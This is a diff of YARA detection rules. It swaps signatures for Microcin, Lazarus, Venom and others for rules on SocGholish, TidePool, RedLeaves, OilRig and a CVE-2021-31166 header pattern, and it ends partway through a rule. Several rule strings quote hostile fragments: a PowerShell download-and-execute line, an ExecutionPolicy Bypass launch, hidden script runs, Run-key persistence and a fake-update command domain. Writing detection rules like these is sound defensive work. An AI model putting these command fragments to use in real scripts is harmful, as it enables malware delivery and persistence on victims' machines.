-		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_microcin.yar#L92-L110"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_socgholish.yar#L1-L22"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "18b9b80ad3c27f32c71197f33e5e99742662cf5cf4ed5f83d574d44ba63f8b5f"
+		hash = "4f6566c145be5046b6be6a43c64d0acae38cada5eb49b2f73135b3ac3d6ba770"
+		hash = "54f756fbf8c20c76af7c9f538ff861690800c622d1c9db26eb3afedc50835b09"
+		hash = "dfdbec1846b74238ba3cfb8c7580c64a0fa8b14b6ed2b0e0e951cc6a9202dd8d"
+		logic_hash = "6621b029f65720e468bd167fcd7429a1f7ba8975298ddbd913b13fbe9e117df2"
 		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "b9c51397e79d5a5fd37647bc4e4ee63018ac3ab9d050b02190403eb717b1366e"
+		quality = 60
+		tags = "ZIP, JS, SOCGHOLISH, FILE"
 
 	strings:
-		$x1 = "Sorry, you are not fortuante ^_^, Please try other password dictionary " fullword ascii
-		$x2 = "DomCrack <IP> <UserName> <Password_Dic file path> <option>" fullword ascii
-		$x3 = "The password is \"%s\"         Time: %d(s)" fullword ascii
-		$x4 = "The password is \" %s \"         Time: %d(s)" fullword ascii
-		$x5 = "No password found!" fullword ascii
-		$x7 = "Can not found the Password Dictoonary file! " fullword ascii
+		$a1 = /\.[a-z0-9]{6}\.js/ ascii
+		$a2 = "Chrome" ascii
+		$a3 = "Opera" ascii
+		$b1 = "Firefox.js" ascii
+		$b2 = "Edge.js" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and 1 of them ) or 2 of them
+		uint16( 0 ) == 0x4b50 and filesize < 1600 and ( 2 of ( $a* ) or any of ( $b* ) )
 }
-rule SIGNATURE_BASE_Microcin_Sample_6 : FILE
+rule SIGNATURE_BASE_EXT_MAL_JS_Socgholish_Mar21_1 : JS SOCGHOLISH FILE
 {
 	meta:
-		description = "Malware sample mentioned in Microcin technical report by Kaspersky"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9988723f-a7ca-598f-9a6c-9f3915732117"
-		date = "2017-09-26"
-		modified = "2023-12-05"
-		reference = "https://securelist.com/files/2017/09/Microcin_Technical-PDF_eng_final.pdf"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_microcin.yar#L112-L128"
+		description = "Triggers on SocGholish JS files"
+		author = "Nils Kuhnert"
+		id = "3ed7d2da-569b-5851-a821-4a3cda3e13ce"
+		date = "2021-03-29"
+		modified = "2023-01-02"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_socgholish.yar#L25-L51"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "280fb17b5ed5ff1c8018e426969f75e18589eabeb2a20e0e623f206e72e8958d"
+		hash = "7ccbdcde5a9b30f8b2b866a5ca173063dec7bc92034e7cf10e3eebff017f3c23"
+		hash = "f6d738baea6802cbbb3ae63b39bf65fbd641a1f0d2f0c819a8c56f677b97bed1"
+		hash = "c7372ffaf831ad963c0a9348beeaadb5e814ceeb878a0cc7709473343d63a51c"
+		logic_hash = "08218ae952577a6ac936de875236cdc3ae32e3aaccd2196b7f43e80d7e748584"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "cbd43e70dc55e94140099722d7b91b07a3997722d4a539ecc4015f37ea14a26e"
-		hash2 = "871ab24fd6ae15783dd9df5010d794b6121c4316b11f30a55f23ba37eef4b87a"
+		tags = "JS, SOCGHOLISH, FILE"
 
 	strings:
-		$s1 = "** ERROR ** %s: %s" fullword ascii
-		$s2 = "TEMPDATA" fullword wide
-		$s3 = "Bruntime error " fullword wide
+		$s1 = "new ActiveXObject('Scripting.FileSystemObject');" ascii
+		$s2 = "['DeleteFile']" ascii
+		$s3 = "['WScript']['ScriptFullName']" ascii
+		$s4 = "['WScript']['Sleep'](1000)" ascii
+		$s5 = "new ActiveXObject('MSXML2.XMLHTTP')" ascii
+		$s6 = "this['eval']" ascii
+		$s7 = "String['fromCharCode']"
+		$s8 = "2), 16)," ascii
+		$s9 = "= 103," ascii
+		$s10 = "'00000000'" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 600KB and all of them )
+		filesize > 3KB and filesize < 5KB and 8 of ( $s* )
 }
-rule SIGNATURE_BASE_ATM_Malware_Javadispcash_1 : FILE
+rule SIGNATURE_BASE_Socgholish_JS_22_02_2022 : FILE
 {
 	meta:
-		description = "Detects ATM Malware JavaDispCash"
-		author = "Frank Boldewin (@r3c0nst)"
-		id = "7aa91719-6539-572a-8618-bfb5290a5b59"
-		date = "2019-03-28"
+		description = "Detects SocGholish fake update Javascript files 22.02.2022"
+		author = "Wojciech Cieślak"
+		id = "68d2dbb7-0079-527a-92c7-450c3dd953b3"
+		date = "2022-02-22"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/r3c0nst/status/1111254169623674882"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_atm_javadipcash.yar#L1-L21"
+		reference = "https://github.com/Neo23x0/signature-base"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_socgholish.yar#L53-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "9a714571281844cfe7193b7c183b86b797ef5de5d1922eacaf45dad8d41cfc52"
+		hash = "3e14d04da9cc38f371961f6115f37c30"
+		hash = "dffa20158dcc110366f939bd137515c3"
+		hash = "afee3af324951b1840c789540d5c8bff"
+		hash = "c04a1625efec27fb6bbef9c66ca8372b"
+		hash = "d08a2350df5abbd8fd530cff8339373e"
+		logic_hash = "fd529cbb511ff6bcf37b44b835e021b28763922f7726ff67db5cbb3f9193c7ae"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		hash1 = "0149667c0f8cbfc216ef9d1f3154643cbbf6940e6f24a09c92a82dd7370a5027"
-		hash2 = "ef407db8c79033027858364fd7a04eeb70cf37b7c3a10069a92bae96da88dfaa"
 
 	strings:
-		$CashInfo = "getNumberOfCashUnits" ascii wide
-		$Dispense = "waitforbillstaken" ascii wide
-		$Inject = "No code to inject!" ascii wide
-		$config = ".Agentcli" ascii wide
-		$log1 = "logft.log" ascii wide
-		$log2 = ".loginside" ascii wide
+		$s1 = "encodeURIComponent(''+" ascii
+		$s2 = "['open']('POST'," ascii
+		$s3 = "new ActiveXObject('MSXML2.XMLHTTP');" ascii
 
 	condition:
-		uint16( 0 ) == 0x4B50 and filesize < 500KB and all of them
+		filesize < 5KB and all of them
 }
-rule SIGNATURE_BASE_HKTL_Powersploit
+rule SIGNATURE_BASE_Tidepool_Malware : FILE
 {
 	meta:
-		description = "Detects default strings used by PowerSploit to establish persistence"
-		author = "Markus Neis"
-		id = "8cb0753c-c5bb-56fc-b492-4e785f4bdaf4"
-		date = "2018-06-23"
+		description = "Detects TidePool malware mentioned in Ke3chang report by Palo Alto Networks"
+		author = "Florian Roth (Nextron Systems)"
+		id = "eec12fd7-f5f8-5bee-98e0-2111766deb55"
+		date = "2016-05-24"
 		modified = "2023-12-05"
-		reference = "https://www.hybrid-analysis.com/sample/16937e76db6d88ed0420ee87317424af2d4e19117fe12d1364fee35aa2fadb75?environmentId=100"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/gen_powersploit_dropper.yar#L1-L15"
+		reference = "http://goo.gl/m2CXWR"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_tidepool.yar#L8-L32"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "00bc389147926f3b474a7072381bb8b9cddad3ff581a5d2182006a674e0c0163"
+		logic_hash = "759920ed7c9320e8412ed0644b28922a545b04f7549f0da6d6c67d6af8a7af3e"
 		score = 75
-		quality = 81
-		tags = ""
-		hash1 = "16937e76db6d88ed0420ee87317424af2d4e19117fe12d1364fee35aa2fadb75"
+		quality = 85
+		tags = "FILE"
+		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba"
+		hash2 = "67c4e8ab0f12fae7b4aeb66f7e59e286bd98d3a77e5a291e8d58b3cfbc1514ed"
+		hash3 = "2252dcd1b6afacde3f94d9557811bb769c4f0af3cb7a48ffe068d31bb7c30e18"
+		hash4 = "38f2c86041e0446730479cdb9c530298c0c4936722975c4e7446544fd6dcac9f"
+		hash5 = "9d0a47bdf00f7bd332ddd4cf8d95dd11ebbb945dda3d72aac512512b48ad93ba"
 
 	strings:
-		$ps = "function" nocase ascii wide
-		$s1 = "/Create /RU system /SC ONLOGON" ascii wide
-		$s2 = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run" ascii wide
+		$x1 = "Content-Disposition: form-data; name=\"m1.jpg\"" fullword ascii
+		$x2 = "C:\\PROGRA~2\\IEHelper\\mshtml.dll" fullword wide
+		$x3 = "C:\\DOCUME~1\\ALLUSE~1\\IEHelper\\mshtml.dll" fullword wide
+		$x4 = "IEComDll.dat" fullword ascii
+		$s1 = "Content-Type: multipart/form-data; boundary=----=_Part_%x" fullword wide
+		$s2 = "C:\\Windows\\System32\\rundll32.exe" fullword wide
+		$s3 = "network.proxy.socks_port\", " fullword ascii
 
 	condition:
-		all of them
+		( uint16( 0 ) == 0x5a4d and filesize < 200KB and ( 1 of ( $x* ) ) ) or ( 4 of them )
 }
-rule SIGNATURE_BASE_Venom_Rootkit : FILE
+
+rule SIGNATURE_BASE_MAL_Hogfish_Report_Related_Sample : FILE
 {
 	meta:
-		description = "Venom Linux Rootkit"
+		description = "Detects APT10 / Hogfish related samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fedc6fa9-7dfb-5e54-a7bf-9a16f96d6886"
-		date = "2017-01-12"
+		id = "7fc4fdda-b71f-5c9c-87a4-5d8290b99348"
+		date = "2018-05-01"
 		modified = "2023-12-05"
-		reference = "https://security.web.cern.ch/security/venom.shtml"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_venom_linux_rootkit.yar#L10-L32"
+		reference = "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt10_redleaves.yar#L13-L31"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "0b2211edc6737e9da3e43bec9ef823e80c6bd6463adbb10d6839e9914aed22ac"
+		logic_hash = "bff74f7a72a3e40e828284ed37b2f7ea64d8df52e946372d38e379d9b7b7a445"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
+		hash1 = "f9acc706d7bec10f88f9cfbbdf80df0d85331bd4c3c0188e4d002d6929fe4eac"
+		hash2 = "7188f76ca5fbc6e57d23ba97655b293d5356933e2ab5261e423b3f205fe305ee"
+		hash3 = "4de5a22cd798950a69318fdcc1ec59e9a456b4e572c2d3ac4788ee96a4070262"
 
 	strings:
-		$s1 = "%%VENOM%CTRL%MODE%%" ascii fullword
-		$s2 = "%%VENOM%OK%OK%%" ascii fullword
-		$s3 = "%%VENOM%WIN%WN%%" ascii fullword
-		$s4 = "%%VENOM%AUTHENTICATE%%" ascii fullword
-		$s5 = ". entering interactive shell" ascii fullword
-		$s6 = ". processing ltun request" ascii fullword
-		$s7 = ". processing rtun request" ascii fullword
-		$s8 = ". processing get request" ascii fullword
-		$s9 = ". processing put request" ascii fullword
-		$s10 = "venom by mouzone" ascii fullword
-		$s11 = "justCANTbeSTOPPED" ascii fullword
+		$s1 = "R=user32.dll" fullword ascii
 
 	condition:
-		filesize < 4000KB and 2 of them
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.imphash ( ) == "efad9ff8c0d2a6419bf1dd970bcd806d" or 1 of them )
 }
 
-rule SIGNATURE_BASE_APT_Lazarus_Dropper_Jun18_1 : FILE
+rule SIGNATURE_BASE_MAL_Redleaves_Apr18_1 : FILE
 {
 	meta:
-		description = "Detects Lazarus Group Dropper"
+		description = "Detects RedLeaves malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "226be9d4-93c0-5512-9667-3388cd6f20d4"
-		date = "2018-06-01"
+		id = "578b40d7-6818-56d5-92ce-535141c0aa8e"
+		date = "2018-05-01"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/DrunkBinary/status/1002587521073721346"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_jun18.yar#L13-L32"
+		reference = "https://www.accenture.com/t20180423T055005Z__w__/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_apt10_redleaves.yar#L33-L48"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "868297209177471f29c9653747d3205f55a14b74a5da64562b20ebeadb14b1cf"
-		score = 60
-		quality = 40
+		logic_hash = "e34b95e96de88aef20050b6b9580600365284117918c24f76c884b089fa20623"
+		score = 75
+		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "086a50476f5ceee4b10871c1a8b0a794e96a337966382248a8289598b732bd47"
-		hash2 = "9f2d4fd79d3c68270102c4c11f3e968c10610a2106cbf1298827f8efccdd70a9"
-
-	strings:
-		$s1 = /%s\\windows10-kb[0-9]{7}.exe/ fullword ascii
-		$s2 = "EYEJIW" fullword ascii
-		$s3 = "update" fullword wide
+		hash1 = "f6449e255bc1a9d4a02391be35d0dd37def19b7e20cfcc274427a0b39cb21b7b"
+		hash2 = "db7c1534dede15be08e651784d3a5d2ae41963d192b0f8776701b4b72240c38d"
+		hash3 = "d956e2ff1b22ccee2c5d9819128103d4c31ecefde3ce463a6dea19ecaaf418a1"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 21000KB and ( pe.imphash ( ) == "fcac768eff9896d667a7c706d70712ce" or all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 1000KB and ( pe.imphash ( ) == "7a861cd9c495e1d950a43cb708a22985" or pe.imphash ( ) == "566a7a4ef613a797389b570f8b4f79df" )
 }
-rule SIGNATURE_BASE_APT_Lazarus_RAT_Jun18_1 : FILE
+rule SIGNATURE_BASE_EXPL_CVE_2021_31166_Accept_Encoding_May21_1 : CVE_2021_31166
 {
 	meta:
-		description = "Detects Lazarus Group RAT"
+		description = "Detects malformed Accept-Encoding header field as used in code exploiting CVE-2021-31166"
 		author = "Florian Roth (Nextron Systems)"
-		id = "fd394d15-70c5-543a-a845-2058f296b5f8"
-		date = "2018-06-01"
+		id = "d0a79cdc-f3ee-58f9-805c-ec9eb7993315"
+		date = "2021-05-21"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/DrunkBinary/status/1002587521073721346"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_jun18.yar#L34-L66"
+		reference = "https://github.com/0vercl0k/CVE-2021-31166"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/exploit_cve_2021_31166.yar#L2-L14"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "7260f766ffd1122319ca69a6c87b0baa98d5727929f2e063a5b2edb05a44d827"
-		score = 75
+		logic_hash = "5bb5b4093a7abe9d4297a4c047803b92f7c08f56f15b0f7bd163203ae47e026d"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c10363059c57c52501c01f85e3bb43533ccc639f0ea57f43bae5736a8e7a9bc8"
-		hash2 = "e98991cdd9ddd30adf490673c67a4f8241993f26810da09b52d8748c6160a292"
+		tags = "CVE-2021-31166"
 
 	strings:
-		$a1 = "www.marmarademo.com/include/extend.php" fullword ascii
-		$a2 = "www.33cow.com/include/control.php" fullword ascii
-		$a3 = "www.97nb.net/include/arc.sglistview.php" fullword ascii
-		$c1 = "Content-Disposition: form-data; name=\"file1\"; filename=\"example.dat\"" fullword ascii
-		$c2 = "Content-Disposition: form-data; name=\"file1\"; filename=\"pratice.pdf\"" fullword ascii
-		$c3 = "Content-Disposition: form-data; name=\"file1\"; filename=\"happy.pdf\"" fullword ascii
-		$c4 = "Content-Disposition: form-data; name=\"file1\"; filename=\"my.doc\"" fullword ascii
-		$c5 = "Content-Disposition: form-data; name=\"board_id\"" fullword ascii
-		$s1 = "Winhttp.dll" fullword ascii
-		$s2 = "Wsock32.dll" fullword ascii
-		$s3 = "WM*.tmp" fullword ascii
-		$s4 = "FM*.tmp" fullword ascii
-		$s5 = "Cache-Control: max-age=0" fullword ascii
+		$xr1 = /[Aa]ccept\-[Ee]ncoding: [a-z\-]{1,16},([a-z\-\s]{1,16},|)*[\s]{1,20},/
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $a* ) or 2 of ( $c* ) or 4 of them )
+		1 of them
 }
-rule SIGNATURE_BASE_APT_Lazarus_RAT_Jun18_2 : FILE
+rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Gen1 : FILE
 {
 	meta:
-		description = "Detects Lazarus Group RAT"
+		description = "Detects malware from OilRig Campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4f2e280e-ed76-5fb9-b137-5191bbea2155"
-		date = "2018-06-01"
+		id = "d291edf1-b086-5c61-b131-61c9f6e1267b"
+		date = "2016-10-12"
 		modified = "2023-12-05"
-		reference = "https://twitter.com/DrunkBinary/status/1002587521073721346"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_lazarus_jun18.yar#L68-L83"
+		reference = "https://goo.gl/QMRZ8K"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L12-L67"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b22b8386791e86f787efc40a394bbabdb4a009fc2d1a7b87aaf5039fc977a5bd"
+		logic_hash = "17dbf53ba6e27b230e3357963162a1805c6460cdadce8bba68953a97f699e1b7"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e6096fb512a6d32a693491f24e67d772f7103805ad407dc37065cebd1962a547"
+		hash1 = "d808f3109822c185f1d8e1bf7ef7781c219dc56f5906478651748f0ace489d34"
+		hash2 = "80161dad1603b9a7c4a92a07b5c8bce214cf7a3df897b561732f9df7920ecb3e"
+		hash3 = "662c53e69b66d62a4822e666031fd441bbdfa741e20d4511c6741ec3cb02475f"
+		hash4 = "903b6d948c16dc92b69fe1de76cf64ab8377893770bf47c29bf91f3fd987f996"
+		hash5 = "c4fbc723981fc94884f0f493cb8711fdc9da698980081d9b7c139fcffbe723da"
+		hash6 = "57efb7596e6d9fd019b4dc4587ba33a40ab0ca09e14281d85716a253c5612ef4"
+		hash7 = "1b2fee00d28782076178a63e669d2306c37ba0c417708d4dc1f751765c3f94e1"
+		hash8 = "9f31a1908afb23a1029c079ee9ba8bdf0f4c815addbe8eac85b4163e02b5e777"
+		hash9 = "0cd9857a3f626f8e0c07495a4799c59d502c4f3970642a76882e3ed68b790f8e"
+		hash10 = "4b5112f0fb64825b879b01d686e8f4d43521252a3b4f4026c9d1d76d3f15b281"
+		hash11 = "4e5b85ea68bf8f2306b6b931810ae38c8dff3679d78da1af2c91032c36380353"
+		hash12 = "c3c17383f43184a29f49f166a92453a34be18e51935ddbf09576a60441440e51"
+		hash13 = "f3856c7af3c9f84101f41a82e36fc81dfc18a8e9b424a3658b6ba7e3c99f54f2"
+		hash14 = "0c64ab9b0c122b1903e8063e3c2c357cbbee99de07dc535e6c830a0472a71f39"
+		hash15 = "d874f513a032ccb6a5e4f0cd55862b024ea0bee4de94ccf950b3dd894066065d"
+		hash16 = "8ee628d46b8af20c4ba70a2fe8e2d4edca1980583171b71fe72455c6a52d15a9"
+		hash17 = "55d0e12439b20dadb5868766a5200cbbe1a06053bf9e229cf6a852bfcf57d579"
+		hash18 = "528d432952ef879496542bc62a5a4b6eee788f60f220426bd7f933fa2c58dc6b"
+		hash19 = "93940b5e764f2f4a2d893bebef4bf1f7d63c4db856877020a5852a6647cb04a0"
+		hash20 = "e2ec7fa60e654f5861e09bbe59d14d0973bd5727b83a2a03f1cecf1466dd87aa"
+		hash21 = "9c0a33a5dc62933f17506f20e0258f877947bdcd15b091a597eac05d299b7471"
+		hash22 = "a787c0e42608f9a69f718f6dca5556607be45ec77d17b07eb9ea1e0f7bb2e064"
+		hash23 = "3772d473a2fe950959e1fd56c9a44ec48928f92522246f75f4b8cb134f4713ff"
+		hash24 = "3986d54b00647b507b2afd708b7a1ce4c37027fb77d67c6bc3c20c3ac1a88ca4"
+		hash25 = "f5a64de9087b138608ccf036b067d91a47302259269fb05b3349964ca4060e7e"
 
 	strings:
-		$s1 = "\\KB\\Release\\" ascii
-		$s3 = "KB, Version 1.0" fullword wide
-		$s4 = "TODO: (c) <Company name>.  All rights reserved." fullword wide
+		$x1 = "Get-Content $env:Public\\Libraries\\update.vbs) -replace" ascii
+		$x2 = "wss.Run \"powershell.exe \" & Chr(34) & \"& {waitfor haha /T 2}\" & Chr(34), 0" fullword ascii
+		$x3 = "Call Extract(UpdateVbs, wss.ExpandEnvironmentStrings(\"%PUBLIC%\") & \"\\Libraries\\update.vbs\")" fullword ascii
+		$s4 = "CreateObject(\"WScript.Shell\").Run cmd, 0o" fullword ascii
+		$b1 = "JGdsb2JhbDpteWhvc3QgP" ascii
+		$b2 = "SE9NRT0iJXB1YmxpYyVcTGlicmFyaWVzX" ascii
+		$b3 = "U2V0IHdzcyA9IENyZWF0ZU9iamVjdCgid1NjcmlwdC5TaGV" ascii
+		$b4 = "JHNjcmlwdGRpciA9IFNwbGl0LVBhdGggLVBhcmVudCAtUGF0aCA" ascii
+		$b5 = "DQpTZXQgd3NzID0gQ3JlYXRlT2JqZWN" ascii
+		$b6 = "d2hvYW1pICYgaG9zdG5hb" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 5000KB and 2 of them
+		( uint16( 0 ) == 0xcfd0 and filesize < 700KB and 1 of them )
 }
-
-rule SIGNATURE_BASE_APT_ME_Bigbang_Gen_Jul18_1 : FILE
+rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Mal1 : FILE
 {
 	meta:
-		description = "Detects malware from Big Bang campaign against Palestinian authorities"
+		description = "Detects malware from OilRig Campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f1097998-9414-511c-b177-ff09154964a8"
-		date = "2018-07-09"
+		id = "c577f0ff-1a33-5d7f-93b2-27df8d414bce"
+		date = "2016-10-12"
 		modified = "2023-12-05"
-		reference = "https://research.checkpoint.com/apt-attack-middle-east-big-bang/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bigbang.yar#L3-L29"
+		reference = "https://goo.gl/QMRZ8K"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L69-L86"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "496994ee035aa09233c648cf4ec0d1e84ceb970917b4dc5208a1390ec6eb39c2"
+		logic_hash = "b5fc4329bb639765890c49907860883b96d278381b83307c906f624e6645dedd"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4db68522600f2d8aabd255e2da999a9d9c9f1f18491cfce9dadf2296269a172b"
-		hash2 = "ac6462e9e26362f711783b9874d46fefce198c4c3ca947a5d4df7842a6c51224"
-		hash3 = "e1f52ea30d25289f7a4a5c9d15be97c8a4dfe10eb68ac9d031edcc7275c23dbc"
+		hash1 = "e17e1978563dc10b73fd54e7727cbbe95cc0b170a4e7bd0ab223e059f6c25fcc"
 
 	strings:
-		$x2 = "%@W@%S@c@ri%@p@%t.S@%he@%l%@l" ascii
-		$x3 = "S%@h%@e%l%@l." ascii
-		$x4 = "(\"S@%t@%a%@rt%@up\")" ascii
-		$x5 = "aW5zdGFsbCBwcm9nOiBwcm9nIHdpbGwgZGVsZXRlIG9sZCB0bXAgZmlsZQ==" fullword ascii
-		$x6 = "aW5zdGFsbCBwcm9nOiBUaGVyZSBpcyBubyBvbGQgZmlsZSBpbiB0ZW1wLg==" fullword ascii
-		$x7 = "VXBkYXRlIHByb2c6IFRoZXJlIGlzIG5vIG9sZCBmaWxlIGluIHRlbXAu" fullword ascii
-		$x8 = "aW5zdGFsbCBwcm9nOiBDcmVhdGUgVGFzayBhZnRlciA1IG1pbiB0byBydW4gRmlsZSBmcm9tIHRtcA==" fullword ascii
-		$x9 = "UnVuIEZpbGU6IE15IHByb2cgaXMgRXhpdC4=" fullword ascii
-		$x10 = "li%@%@nk.W%@%@indo@%%@%@%wS%@%@tyle = 3" fullword ascii
+		$x1 = "DownloadExecute=\"powershell \"\"&{$r=Get-Random;$wc=(new-object System.Net.WebClient);$wc.DownloadFile(" ascii
+		$x2 = "-ExecutionPolicy Bypass -File \"&HOME&\"dns.ps1\"" fullword ascii
+		$x3 = "CreateObject(\"WScript.Shell\").Run Replace(DownloadExecute,\"-_\",\"bat\")" fullword ascii
+		$x4 = "CreateObject(\"WScript.Shell\").Run DnsCmd,0" fullword ascii
+		$s1 = "http://winodwsupdates.me" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of them or pe.imphash ( ) == "0f09ea2a68d04f331df9a5d0f8641332" )
+		( uint16( 0 ) == 0x4f48 and filesize < 4KB and 1 of them ) or ( 2 of them )
 }
-rule SIGNATURE_BASE_APT_ME_Bigbang_Mal_Jul18_1 : FILE
+rule SIGNATURE_BASE_Oilrig_Malware_Campaign_Gen2 : FILE
 {
 	meta:
-		description = "Detects malware from Big Bang report"
+		description = "Detects Oilrig malware samples"
 		author = "Florian Roth (Nextron Systems)"
-		id = "f30b2e11-f90a-5068-8eaa-25f11218ec6c"
-		date = "2018-07-09"
-		modified = "2023-12-05"
-		reference = "https://research.checkpoint.com/apt-attack-middle-east-big-bang/"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_bigbang.yar#L31-L51"
+		id = "2ca0aadf-c5a8-5c89-ab1e-0c06d2ab8516"
+		date = "2016-10-12"
+		modified = "2023-01-07"
+		reference = "https://goo.gl/QMRZ8K"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_oilrig.yar#L88-L110"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "da45482b465549fce0f088c5818dff4a734faa2e4fbcec43b750893d1c3fefad"
+		logic_hash = "861ae1696aaa89c81d04214e67d77d98ae85bd7f64ae2979fbe932dc696fd32c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ac6462e9e26362f711783b9874d46fefce198c4c3ca947a5d4df7842a6c51224"
-		hash2 = "e1f52ea30d25289f7a4a5c9d15be97c8a4dfe10eb68ac9d031edcc7275c23dbc"
+		hash1 = "c6437f57a8f290b5ec46b0933bfa8a328b0cb2c0c7fbeea7f21b770ce0250d3d"
+		hash2 = "293522e83aeebf185e653ac279bba202024cedb07abc94683930b74df51ce5cb"
 
 	strings:
-		$s1 = "%Y%m%d-%I-%M-%S" fullword ascii
-		$s2 = "/api/serv/requests/%s/runfile/delete" fullword ascii
-		$s3 = "\\part.txt" ascii
-		$s4 = "\\ALL.txt" ascii
-		$s5 = "\\sat.txt" ascii
-		$s6 = "runfile.proccess_name" fullword ascii
